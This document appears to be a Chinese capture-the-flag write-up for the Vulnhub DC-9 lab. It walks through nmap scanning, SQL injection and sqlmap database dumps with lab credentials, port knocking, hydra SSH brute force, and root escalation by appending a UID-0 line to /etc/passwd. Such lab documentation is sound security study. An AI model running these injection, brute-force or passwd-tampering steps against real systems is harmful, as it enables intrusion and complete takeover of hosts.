Vulnhub-DC-9靶机-SQL注入拿到账户+利用端口敲门连接ssh+信息泄露利用root脚本追加提权
一、环境搭建
选择扫描虚拟机
选择靶机路径
如果出现以下信息
如下修改,修改和虚拟机一样的版本
二、信息收集
扫ip
nmap -sn 192.168.108.0/24
得到靶机ip:192.168.108.143
扫开放端口
nmap -p 1-65535 192.168.108.143
只开放了两个端口
信息如下
22/tcp filtered ssh #filtered是“过滤的”,意味着网络防火墙或其他安全设备正在阻止对该端口的访问,或者没有响应
80/tcp open http
扫版本服务信息
nmap -sV 192.168.108.143
得到以下信息
信息如下
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian)) #web的Apache服务版本
指纹探测
执行以下命令
nmap 192.168.108.143 -p 22,80 -sV -sC -O --version-all
可用信息:
运行系统:linux 3.x|4.x
操作系统CPE:cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
操作系统内核:linux 3.2-4.9
目录扫描
先用dirsaerch扫描
看看dirb扫描
整理一下可用信息
http://192.168.108.143/config.php //配置文件
http://192.168.108.143/display.php //副页面
http://192.168.108.143/includes
http://192.168.108.143/logout.php //登出界面
http://192.168.108.143/manage.php //管理界面-登录框
http://192.168.108.143/search.php //搜索界面
http://192.168.108.143/index.php //主界面
三、Web渗透
看看80端口,是如下一个界面
访问这几个页面以及上面扫描出来的目录,只有search和manage界面有可用信息,在manage界面存在一个登录框,尝试弱口令和万能密码无果
只能在search界面试试,这里搜索需要使用第二个界面的内容
当我们搜索Tom时,会出现一下信息,应该是调用了数据库信息然后给我们的回显,那么可能存在SQL注入
SQL注入
当我们输入Tom' or '1'='1时,存在sql注入
抓包看看,得到search参数
创建一个DC9.txt,将数据包内容输入进去,然后利用sqlmap跑出数据库
sqlmap -r DC9.txt --dbs
得到3个数据库
这里先看看Staff数据库,拿到两个数据表
看看Users表中的列
看看数据表内容
sqlmap -r DC9.txt -D Staff -T Users --dump
拿到一个管理员账号密码
password 'transorbital1' for user 'admin'
拿到的数据库
数据库:information_schema,Staff,users
看看users库
看看该表的列
看看表中数据
sqlmap -r DC9.txt -D users -T UserDetails --dump
将用户名和密码单独列出来
sqlmap -r DC9.txt -D users -T UserDetails -C username --dump
sqlmap -r DC9.txt -D users -T UserDetails -C password --dump
用户名
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
密码
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
登录后台
成功登录进去,但是在此处发现一个文件不存在,可能存在文件包含
试试目录遍历,拿到了很多用户名信息
端口敲门服务
参考文章:https://www.cnblogs.com/wsjhk/p/5508051.html
随便拿一个上面爆破出的账号密码登录一下,发现22端口无法正常使用
这里需要了解一个知识点,端口敲门服务
端口敲门(Port Knocking)是一种安全机制,用于在防火墙上动态地打开特定端口,以便允许特定的网络流量通过。这种技术通常用于增强服务器的安全性,特别是在需要远程访问(如 SSH)时。
看看其配置文件,得到敲门序列:sequence = 7469,8475,9842
这里有几种方法,比如使用nc工具一个一个连接,或者下载knock工具,对获取的端口(开门密码)实现碰撞,必须按照序列进行连接
apt install knock
knock 192.168.108.143 7469 8475 9842
然后看看端口开放状态,成功开启端口
ssh爆破
这里需要使用hydra工具
Hydra 是一个非常流行的开源密码破解工具,广泛用于进行暴力破解和字典攻击。它支持多种协议和服务,包括 HTTP, FTP, SSH, Telnet, SMTP, POP3, IMAP 等等。Hydra 的灵活性和强大的功能使其成为渗透测试和安全评估中的重要工具
kali通常是预装的,准备一个用户名表和密码表
利用hydra进行爆破
hydra -L user.txt -P passwd.txt ssh://192.168.108.143
拿到以下信息
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
四、提权
ssh登录寻找信息
chandlerb
没有什么可用信息
joeyt
也是没什么有用信息
janitor
发现一个目录,里面有一个密码文件
放到原先的密码表,再使用hydra爆破一处,拿到一个新账户
login: fredf password: B4-Tru3-001
利用新账户登录
发现一个无需root权限可用使用的文件,/opt/devstuff/dist/test
执行该文件,发现如下信息
在/opt/devstuff目录下发现test.py
查看该文件
#!/usr/bin/python
import sys
if len (sys.argv) != 3 : #检查命令行参数数量
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r") #将第一个参数可读
output = (f.read())
f = open(sys.argv[2], "a") #将第一个参数的内容追加到第二个参数
f.write(output)
f.close()
这里举个例子,如果我们执行 ./test.py 1.txt 2.txt,那么程序会把1.txt的内容追加到2.txt,因为这个脚本是以root权限运行的,所以我们可以利用它追加账户密码到/etc/passwd中
追加账户密码提权
先使用openssl生成一个密码
然后将密码写入一个文件
track:$1$lPvyU8TX$Da4wA8ijXmhJGCWUmt5Kj0:0:0::/root:/bin/bash
echo "track:$1$lPvyU8TX$Da4wA8ijXmhJGCWUmt5Kj0:0:0::/root:/bin/bash" > /tmp/a.txt
将文件写入/etc/passwd
sudo /opt/devstuff/dist/test/test /tmp/a.txt /etc/passwd
然后登录即可
sudo track
密码:track
浙公网安备 33010602011771号